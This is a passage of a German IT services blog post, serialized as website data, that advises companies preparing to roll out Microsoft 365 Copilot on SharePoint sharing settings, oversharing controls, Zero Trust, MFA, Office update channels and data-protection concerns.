Zugriff.",[1671,20831,20815],{"id":20832},"empfehlung-1",[806,20834,1536],{},[806,20836,20837],{},"Überprüft die Zugriffs- und Berechtigungseinstellungen auf den wichtigen SharePoint-Sites. Häufig verstecken sich dort beispielsweise \"Alle Benutzer\"-Objekte in den Gruppen der \"Website-Besucher\".",[810,20839,20841],{"id":20840},"dokumente-und-ordner-ab-jetzt-richtig-teilen","Dokumente und Ordner (ab jetzt) richtig teilen",[806,20843,816],{},[806,20845,20846],{},"Ein weiterer, häufiger Fehler sind die sogenannten \"Everyone Except External\"-Links, mit denen Dokumente oder Ordner geteilt werden.",[806,20848,20849],{},"Praktisch, aber gefährlich: Wählt man beim Teilen eines Dokuments den Linktyp “Personen in meiner Organisation”, erhält jede Person, die den Link verwendet, Zugriff auf die Datei – und somit auch Copilot, da dieser immer im Benutzerkontext agiert.",[806,20851,20852,20154],{},[1449,20853],{"alt":20854,"src":20855},"Freigabeeinstellungen eines Dokuments","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsoft-365-copilot-link-settings.png",[806,20857,20858],{},"Solche Links auf ganze Ordner, deren Inhalte sich über Monate oder Jahre verändern, führen häufig zu Oversharing-Vorfällen. Diese Art von Link bleibt wichtig und praktisch, sollte jedoch nicht als Standardeinstellung verwendet werden. Ein einfacher Tipp kann hier Abhilfe schaffen.",[1671,20860,20815],{"id":20861},"empfehlung-2",[806,20863,1536],{},[806,20865,20866],{},"Im SharePoint-Admincenter findet ihr unter „Richtlinien“ den Abschnitt „Datei- und Ordnerlinks“. Setzt hier die Standardeinstellung auf „Bestimmte Personen“. Dadurch wird die Option „Nur Personen in meiner Organisation“ erst durch bewusstes Anklicken verfügbar.",[806,20868,20869,20154],{},[1449,20870],{"alt":20871,"src":20872},"Zuordnung der Managed Services zu NIS2","https://res.cloudinary.com/c4a8/image/upload/w_940,h_200,c_lpad/blog/pics/microsooft-365-copilot-default-link-setting.png",[806,20874,20875],{},[833,20876,20879,20883],{"role":3858,"className":20877,"dataText":20878,"href":170},[3860,16252,3863],"Primary Link",[1588,20880,20882],{"className":20881},[3872],"Mehr erfahren",[1588,20884,20887],{"className":20885,"style":19157},[19154,19155,20886,3863],"icon--arrow",[19159,20888,20890],{"viewBox":20889,"width":19162,"height":19162,"padding":19163,"xmlSpace":19164,"version":19165,"xmlns":19166,"xmlns:link":19167,"style":19168},"0 0 28 17",[20891,20892,20894,20902],"g",{"transform":20893},"translate(0.75 0.75)",[19171,20895],{"d":20896,"transform":20897,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},"M0.5 0.5L26 0.5","translate(0 7)","none","evenodd","1.5","round",[19171,20903],{"d":20904,"transform":20905,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},"M0 15L7 7.5L0 0","translate(19 0)",[810,20907,20761],{"id":20908},"sharepoint-advanced-management",[806,20910,816],{},[806,20912,20913],{},"Eine neue zentrale Möglichkeit, um das volle Potenzial auszuschöpfen, ist die Nutzung der SharePoint Advanced Management-Funktionen. Diese ist seit dem 01.01.2025 in allen M365 Copilot Lizenzen inkludiert. Das bedeutet, egal ob man 1 oder 10.000 M365 Copilot Lizenzen hat, SharePoint Advanced Management ist jetzt inklusive.",[806,20915,20916],{},"SharePoint Advanced Management umfasst eine Vielzahl von Funktionen rund um die Themen Data Oversharing, Governance und Security. Bisher war dieses Add-On zusätzlich zu lizenzieren und hat deswegen kaum Beachtung gefunden. Die Funktionen und Möglichkeiten, die darin stecken, sind aber beachtlich und waren schon immer eine sinnvolle Ergänzung für die Administration und Vorbereitung von SharePoint Online in Bezug auf eine Einführung von künstlicher Intelligenz, wie Copilot. Microsoft beschreibt 4 Säulen, die SAM unterstützt:",[3604,20918,20192],{},[1902,20920,20921,20931],{},[1907,20922,20923],{},[1911,20924,20925,20928],{},[1915,20926,20927],{},"Thema",[1915,20929,20930],{},"Beschreibung",[1923,20932,20933,20941,20949,20957],{},[1911,20934,20935,20938],{},[1928,20936,20937],{},"Verwalten von Content-Wildwuchs",[1928,20939,20940],{},"Unterstützung der Administratoren bei der Verwaltung einer stetig wachsenden Anzahl an Dateien",[1911,20942,20943,20946],{},[1928,20944,20945],{},"Oversharing verhindern",[1928,20947,20948],{},"Erkennung und Verhinderung von Oversharing, z. B. durch defekte Berechtigungsvererbungen",[1911,20950,20951,20954],{},[1928,20952,20953],{},"Zugriff von Copilot auf Inhalte verwalten",[1928,20955,20956],{},"Tools zur Echtzeitkontrolle darüber, auf welche Dokumente Copilot zugreifen darf und auf welche nicht",[1911,20958,20959,20962],{},[1928,20960,20961],{},"Verwaltung des Dokumenten-Lifecycle",[1928,20963,20964],{},"Unterstützung bei der Überwachung und Steuerung aktiver und inaktiver SharePoint-Inhalte",[1671,20966,20815],{"id":20967},"empfehlung-3",[806,20969,1536],{},[806,20971,20972],{},"Wir empfehlen jedem, der sich aktuell mit M365 Copilot beschäftigt, diese Funktionen zu aktivieren und zu nutzen. Dazu gehören insbesondere die Data Access Governance, Site Lifecycle Management und Restricted Access Control Policy sowie die Funktionen, von denen einige noch in der Preview sind (Oversharing Baseline Report und Restricted Content Discoverability Policy).",[806,20974,20975,20976],{},"Mehr Details zu SharePoint Advanced Management findet ihr ",[833,20977,20980],{"href":20978,"rel":20979},"https://learn.microsoft.com/en-us/sharepoint/get-ready-copilot-sharepoint-advanced-management",[1410],"auf der offiziellen Seite von Microsoft.",[810,20982,20767],{"id":20983},"grundlegende-sicherheit-im-tenant-herstellen",[806,20985,816],{},[806,20987,20988],{},"Neben dem Zugriff auf Daten durch Copilot sollten wir sicherstellen, dass unser Tenant umfassend abgesichert ist. Der Einsatz künstlicher Intelligenz macht dies spätestens jetzt unverzichtbar. Es gibt zahlreiche Maßnahmen zur Absicherung – hier ein Überblick mit den wichtigsten Punkten.",[1671,20990,20992],{"id":20991},"umsetzung-zero-trust","Umsetzung Zero Trust",[806,20994,1536],{},[806,20996,20997],{},"Der Begriff Zero-Trust ist in aller Munde – wahrscheinlich bist du ihm auch schon begegnet. Doch was bedeutet das genau, besonders im Kontext von Copilot? Kurz gesagt: Zero-Trust bedeutet in diesem Fall, dass niemand pauschalen Zugriff auf alles erhält, sondern nur auf die Ressourcen, die aktuell benötigt werden. Dieses Prinzip, bekannt als Least Privileged Access, ist essenziell, um Daten und Systeme vor unberechtigtem Zugriff zu schützen. Es knüpft direkt an Themen wie Oversharing an, da der Fokus darauf liegt, nur die notwendigen Informationen freizugeben.",[806,20999,21000],{},"Doch Zero-Trust beschränkt sich nicht nur auf SharePoint. Es betrifft auch den Zugriff auf E-Mails in Outlook, Kundeninformationen im CRM-System und andere sensible Bereiche. Mit der zunehmenden Integration von Copilot und künstlicher Intelligenz in Microsoft 365 und darüber hinaus gewinnt dieses Konzept weiter an Bedeutung. Je früher du und dein Team euch damit auseinandersetzt, desto besser seid ihr für die Zukunft gerüstet.",[1671,21002,21004],{"id":21003},"zero-trust-besonders-wichtig-für-administratoren","Zero-Trust: Besonders wichtig für Administratoren",[806,21006,1536],{},[806,21008,21009],{},"Für Admins gewinnt das Thema noch mehr an Bedeutung: Mit der Einführung von Copilot in den Admincentern und dem Security-Copilot wird es unverzichtbar, administrative Zugriffe abzusichern. Tools wie Privileged Identity Management (PIM) sind hierbei entscheidend, um sicherzustellen, dass Admin-Rechte nur dann vergeben werden, wenn sie wirklich benötigt werden – und selbst dann nur zeitlich begrenzt und streng überwacht.",[806,21011,21012],{},[1736,21013,21014],{},"Mehrfaktor-Authentifizierung & Bedingter Zugriff? Ein Muss",[806,21016,21017],{},"Ein weiteres Kernelement der Sicherheit ist die Einrichtung von Multi-Faktor-Authentifizierung (MFA) und Conditional Access für alle Entra-ID-Konten in Microsoft 365. Microsoft forciert diese Einstellungen zunehmend, sodass du sicherstellen solltest, dass sämtliche Konten in deiner Organisation entsprechend abgesichert sind.",[806,21019,21020],{},"Warum ist das so wichtig? Technisch gesehen hat die Nutzung von Copilot nichts direkt mit MFA oder Conditional Access zu tun. Doch es geht darum sicherzustellen, dass die Person, die sich anmeldet, tatsächlich diejenige ist, für die sie sich ausgibt. Denn es wäre fatal, wenn ein Angreifer Zugriff auf einen leistungsstarken KI-Assistenten erhält.",[1671,21022,21024],{"id":21023},"sicherheit-ist-mehr-als-nur-grundlagen","Sicherheit ist mehr als nur Grundlagen",[806,21026,1536],{},[806,21028,21029],{},"Natürlich sind Zero-Trust, MFA und Conditional Access nur der Anfang. Ein wirklich sicherer Tenant umfasst viele weitere Aspekte. Microsoft bietet eine breite Palette an Sicherheitslösungen, darunter die Microsoft Defender-Produkte, Entra ID, Sentinel und viele mehr. Diese Tools helfen dir, deine Organisation noch besser zu schützen und Sicherheitslücken zu schließen.",[1671,21031,20815],{"id":21032},"empfehlung-4",[806,21034,1536],{},[806,21036,21037],{},"Wenn du Unterstützung bei der Umsetzung benötigst oder unsicher bist, wo du anfangen sollst, helfen wir dir gerne weiter. Sicherheit ist eine Reise – und wir begleiten und unterstützen dich dabei, die richtigen Schritte zu machen, um dein Unternehmen zu schützen.",[806,21039,21040,2025,21058],{},[833,21041,21043,21047],{"role":3858,"className":21042,"dataText":20878,"href":410},[3860,16252,3863],[1588,21044,21046],{"className":21045},[3872],"Mehr zu unserem Security Consulting Angebot erfahren",[1588,21048,21050],{"className":21049,"style":19157},[19154,19155,20886,3863],[19159,21051,21052],{"viewBox":20889,"width":19162,"height":19162,"padding":19163,"xmlSpace":19164,"version":19165,"xmlns":19166,"xmlns:link":19167,"style":19168},[20891,21053,21054,21056],{"transform":20893},[19171,21055],{"d":20896,"transform":20897,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},[19171,21057],{"d":20904,"transform":20905,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},[833,21059,21061,21065],{"role":3858,"className":21060,"dataText":20878,"href":423},[3860,16252,3863],[1588,21062,21064],{"className":21063},[3872],"Mehr über unser Cloud Security Operations Center erfahren",[1588,21066,21068],{"className":21067,"style":19157},[19154,19155,20886,3863],[19159,21069,21070],{"viewBox":20889,"width":19162,"height":19162,"padding":19163,"xmlSpace":19164,"version":19165,"xmlns":19166,"xmlns:link":19167,"style":19168},[20891,21071,21072,21074],{"transform":20893},[19171,21073],{"d":20896,"transform":20897,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},[19171,21075],{"d":20904,"transform":20905,"fill":20898,"fillRule":20899,"strokeWidth":20900,"strokeLineCap":20901,"strokeLineJoin":20901},[810,21077,20773],{"id":21078},"aktualisierung-der-office-applikationen",[806,21080,816],{},[806,21082,21083],{},"Der volle Mehrwert von Microsoft Copilot entfaltet sich erst durch die Integration des AI-Assistenten in den installierten Office-Applikationen (M365 Apps). Dazu gehören aktuell Word, Excel, PowerPoint, OneNote, Outlook und Teams.",[806,21085,21086,20154],{},[1449,21087],{"alt":21088,"src":21089},"Microsoft 365 Tenant","https://res.cloudinary.com/c4a8/image/upload/blog/pics/microsooft-365-copilot-tenant.png",[806,21091,21092],{},"Allerdings unterscheidet Microsoft die Verfügbarkeit und Funktionen von Copilot je nach Version der installierten Apps. Wenn bei Benutzenden beispielsweise der Semi-Annual Enterprise Channel eingerichtet ist, stehen ihnen die KI-Features von Microsoft nicht zur Verfügung.",[1671,21094,20815],{"id":21095},"empfehlung-5",[806,21097,1536],{},[806,21099,21100],{},"Stellt sicher, dass eure Office-Apps mindestens den Monthly Enterprise Channel oder idealerweise den Current Channel nutzen. Nur so gewährleistet ihr, dass Copilot und die neuesten Funktionen nahtlos verfügbar sind.",[806,21102,21103,21104,21108],{},"Doch das ist nur ein Teil des Gesamtbildes. Themen wie Application Lifecycle Management und der Einsatz moderner Software-Management-Plattformen spielen eine entscheidende Rolle, insbesondere in Verbindung mit Intune. Hierbei unterstützt euch unsere Lösung ",[833,21105,516],{"href":21106,"rel":21107},"https://www.realmjoin.com/",[1410],", um den Prozess effizient zu gestalten und eure Anwendungen stets auf dem neuesten Stand zu halten.",[806,21110,21111],{},"RealmJoin ist die Cloud-basierte Ergänzung zu Microsoft Intune und das fehlende Puzzlestück auf dem Weg zu einer umfassenden Client-Management-Plattform. Es erleichtert die Bereitstellung von fast 2.000 vorgefertigten Standardanwendungen für Intune in hoher Qualität – eine moderne Paketfabrik für benutzerdefinierte Anwendungen, ergänzt durch zusätzliche Funktionen wie LAPS, Remote-Support und Runbook-Automatisierung.",[810,21113,20779],{"id":21114},"datenschutz-datensicherheit",[806,21116,816],{},[806,21118,21119],{},"Gerade in europäischen Unternehmen stößt man auf Vorbehalte, wenn es um die Einführung von Microsoft Copilot geht – und das ist absolut nachvollziehbar. Neue Technologien können Unsicherheit auslösen, insbesondere wenn es um sensible Themen wie Datenschutz und Kontrolle geht.",[806,21121,21122],{},"Wenn ihr Copilot einführen möchtet, denkt daran, dass es nicht nur um die Technik geht. Setzt euch frühzeitig mit den entsprechenden Datenschutz- und Sicherheitsanforderungen auseinander. Holt dabei alle relevanten Stakeholder ins Boot – dazu gehören der interne oder externe Datenschutzbeauftragte, euer CISO, Betriebsräte, Compliance-Administratoren und andere Verantwortliche. Besprecht Vorbehalte und Fragen offen miteinander. Oft lassen sich diese Bedenken durch klare Informationen und bestehende Richtlinien ausräumen.",[806,21124,21125],{},"Microsoft bietet umfassende Dokumentationen und Erklärungen, die zeigen, wie, wann und wo Daten verarbeitet werden. Hier sind die wichtigsten Fakten:",[2738,21127,21128,21134,21140,21146,21152,21158,21164],{},[2741,21129,21130,21133],{},[1736,21131,21132],{},"Grounding der KI-Modelle:"," Die von Copilot genutzten KI-Modelle greifen nicht direkt auf eure Daten zu. Stattdessen erfolgt der Zugriff über den Microsoft Graph und ist strikt auf den Benutzerkontext beschränkt.",[2741,21135,21136,21139],{},[1736,21137,21138],{},"Datenschutz- und Sicherheitsstandards:"," Copilot erfüllt alle relevanten Datenschutz-, Sicherheits- und Compliance-Vorgaben, darunter die DSGVO, die EU-Datenschutzgrundverordnung sowie Standards wie ISO/IEC 27018 und den EU AI-Act.",[2741,21141,21142,21145],{},[1736,21143,21144],{},"EU-Data Boundary:"," Alle Daten werden so nah wie möglich am Benutzer verarbeitet, jedoch immer innerhalb der EU. Die sogenannte EU-Data Boundary wird strikt eingehalten.",[2741,21147,21148,21151],{},[1736,21149,21150],{},"Verschlüsselung:"," Eingaben (Prompts) und Ergebnisse werden verschlüsselt und niemals zur Weiterentwicklung von KI-Modellen (LLMs) genutzt.",[2741,21153,21154,21157],{},[1736,21155,21156],{},"Compliance und Nachvollziehbarkeit:"," Prompts und Ergebnisse werden verschlüsselt im Tenant gespeichert. Sie können im Rahmen gesetzlicher Anforderungen analysiert werden, beispielsweise für Prüfungen oder bei richterlichen Anordnungen. Der Zugriff darauf ist nur mit speziellen Berechtigungen, etwa über Content Search oder eDiscovery, möglich.",[2741,21159,21160,21163],{},[1736,21161,21162],{},"Sicherheitsmaßnahmen:"," Microsoft schützt seine Dienste, einschließlich Copilot, durch logische Isolierung, physische Sicherheitsmaßnahmen und Verschlüsselungstechnologien. Plug-Ins haben nur eingeschränkten Zugriff auf verschlüsselte Inhalte.",[2741,21165,21166,21169],{},[4655,21167,21168],{},"Responsible AI:"," Microsoft legt großen Wert auf die verantwortungsvolle Nutzung von KI. Der Fokus liegt darauf, KI-Services positiv und ethisch einzusetzen und ihren Missbrauch für illegale oder fragwürdige Zwecke zu verhindern.",[1671,21171,20815],{"id":21172},"empfehlung-6",[806,21174,1536],{},[806,21176,21177],{},"Indem ihr euch frühzeitig mit diesen Themen beschäftigt und die relevanten Personen einbindet, schafft ihr Vertrauen und legt den Grundstein für eine erfolgreiche Einführung. Viele Bedenken lassen sich bereits durch die bestehenden Sicherheitsmaßnahmen und Richtlinien von Microsoft entkräften. Wenn ihr Unterstützung benötigt, stehen wir euch gerne zur Seite. Datenschutz und Sicherheit sind entscheidend – und wir helfen euch, diese Anforderungen optimal umzusetzen.",[806,21179,21180],{},"Mehr Informationen und Hintergrundwissen gibt es direkt bei Microsoft an verschiedenen Stellen wie:",[2738,21182,21183,21189,21195],{},[2741,21184,21185],{},[833,21186,21187],{"href":21187,"rel":21188},"https://learn.microsoft.com/de-de/copilot/microsoft-365/microsoft-365-copilot-privacy",[1410],[2741,21190,21191],{},[833,21192,21193],{"href":21193,"rel":21194},"https://support.microsoft.com/de-de/topic/was-ist-verantwortungsvolle-ki-33fc14be-15ea-4c2c-903b-aa493f5b8d92",[1410],[2741,21196,21197],{},[833,21198,21199],{"href":21199,"rel":21200},"https://learn.microsoft.com/de-de/copilot/microsoft-365/microsoft-365-copilot-architecture-data-protection-auditing",[1410],{"title":863,"searchDepth":864,"depth":864,"links":21202},[21203,21204,21207,21210,21213,21216,21219,21225,21228],{"id":20744,"depth":864,"text":20745},{"id":20782,"depth":864,"text":20755,"children":21205},[21206],{"id":20790,"depth":1814,"text":20791},{"id":20802,"depth":864,"text":20803,"children":21208},[21209],{"id":20814,"depth":1814,"text":20815},{"id":20823,"depth":864,"text":20824,"children":21211},[21212],{"id":20832,"depth":1814,"text":20815},{"id":20840,"depth":864,"text":20841,"children":21214},[21215],{"id":20861,"depth":1814,"text":20815},{"id":20908,"depth":864,"text":20761,"children":21217},[21218],{"id":20967,"depth":1814,"text":20815},{"id":20983,"depth":864,"text":20767,"children":21220},[21221,21222,21223,21224],{"id":20991,"depth":1814,"text":20992},{"id":21003,"depth":1814,"text":21004},{"id":21023,"depth":1814,"text":21024},{"id":21032,"depth":1814,"text":20815},{"id":21078,"depth":864,"text":20773,"children":21226},[21227],{"id":21095,"depth":1814,"text":20815},{"id":21114,"depth":864,"text":20779,"children":21229},[21230],{"id":21172,"depth":1814,"text":20815},{"seoTitle":21232,"titleClass":873,"date":21233,"categories":21234,"blogtitlepic":21235,"socialimg":21236,"customExcerpt":21237,"keywords":21238,"contactInContent":21239,"scripts":21266},"Microsoft 365 Copilot einführen: Sicherheits- und Datenschutz-Tipps für 2025","2025-01-10",[26],"header-m365-copilot","/blog/heads/header-m365-copilot.png","Auch 2025 bleibt künstliche Intelligenz, insbesondere Microsoft 365 Copilot, ein zentrales Thema. Viele Unternehmen stehen vor der Pilotierung oder Einführung dieser Technologie. Falls auch ihr dazu gehört, haben wir die wichtigsten Grundlagen vorbereitet, die ihr vorab prüfen oder umsetzen solltet. Besonders wichtig: eine gründliche Auseinandersetzung mit Sicherheits- und Datenschutzaspekten, um eine sichere Implementierung zu gewährleisten. In diesem Artikel erfahrt ihr, worauf es dabei ankommt, um Microsoft Copilot optimal zu nutzen.","Microsoft 365 Copilot, Einführung Microsoft Copilot, Sicherheitsrichtlinien Microsoft 365, Datenschutz Copilot, KI Implementierung, Copilot Pilotierung, Microsoft Copilot Grundlagen, sichere Implementierung, Microsoft KI Einführung, Microsoft 365 Tipps 2025",{"quote":508,"infos":21240},{"bgColor":883,"headline":21241,"subline":21242,"level":810,"textStyling":887,"flush":888,"person":21243,"form":21250},"Jetzt beraten lassen","Ihr möchtet wissen, wie ihr Copilot optimal in eurem Unternehmen einführt? Wir unterstützen euch gerne bei der Integration und beantworten eure Fragen zu den technischen Voraussetzungen, Sicherheitsmaßnahmen und Nutzungsszenarien.",{"image":21244,"cloudinary":508,"alt":994,"name":994,"quotee":994,"quoteeTitle":21245,"quote":21246,"detailsHeader":895,"details":21247},"/people/Karsten.Kleinschmidt-250.jpg","Managed Workplace Lead","Damit Microsoft 365 Copilot sein volles Potenzial entfalten kann, ist eine sorgfältige Vorbereitung im Hinblick auf Sicherheit und Compliance unerlässlich.",[21248,21249],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":905,"cta":21251,"method":870,"action":908,"fields":21252},{"skin":907},[21253,21254,21256,21258,21260,21262,21264,21265],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":21255},"Bitte Namen eingeben",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":21257},"Bitte Unternehmensnamen ausfüllen",{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":21259},"Bitte E-Mail-Adresse eingeben",{"label":21261,"type":933,"id":934,"required":508,"requiredMsg":935},"Deine Daten werden zur Bearbeitung und Beantwortung Deiner Anfrage bei uns gespeichert. Weitere Informationen zum Datenschutz findest du in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.",{"type":911,"id":942,"value":21263},"Anfrage Blog Microsoft 365 Copilot",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"slick":508,"form":508},"/posts/2025-01-09-microsoft-365-copilot",{"title":20738,"description":863},"posts/2025-01-09-microsoft-365-copilot",[26,149,21271,21272],"KI Implementierung","Copilot Pilotierung","e4szDB6QUiRunpcRclgo44YWm-Zuu6PcZGhgYq7umJA",1782490259995]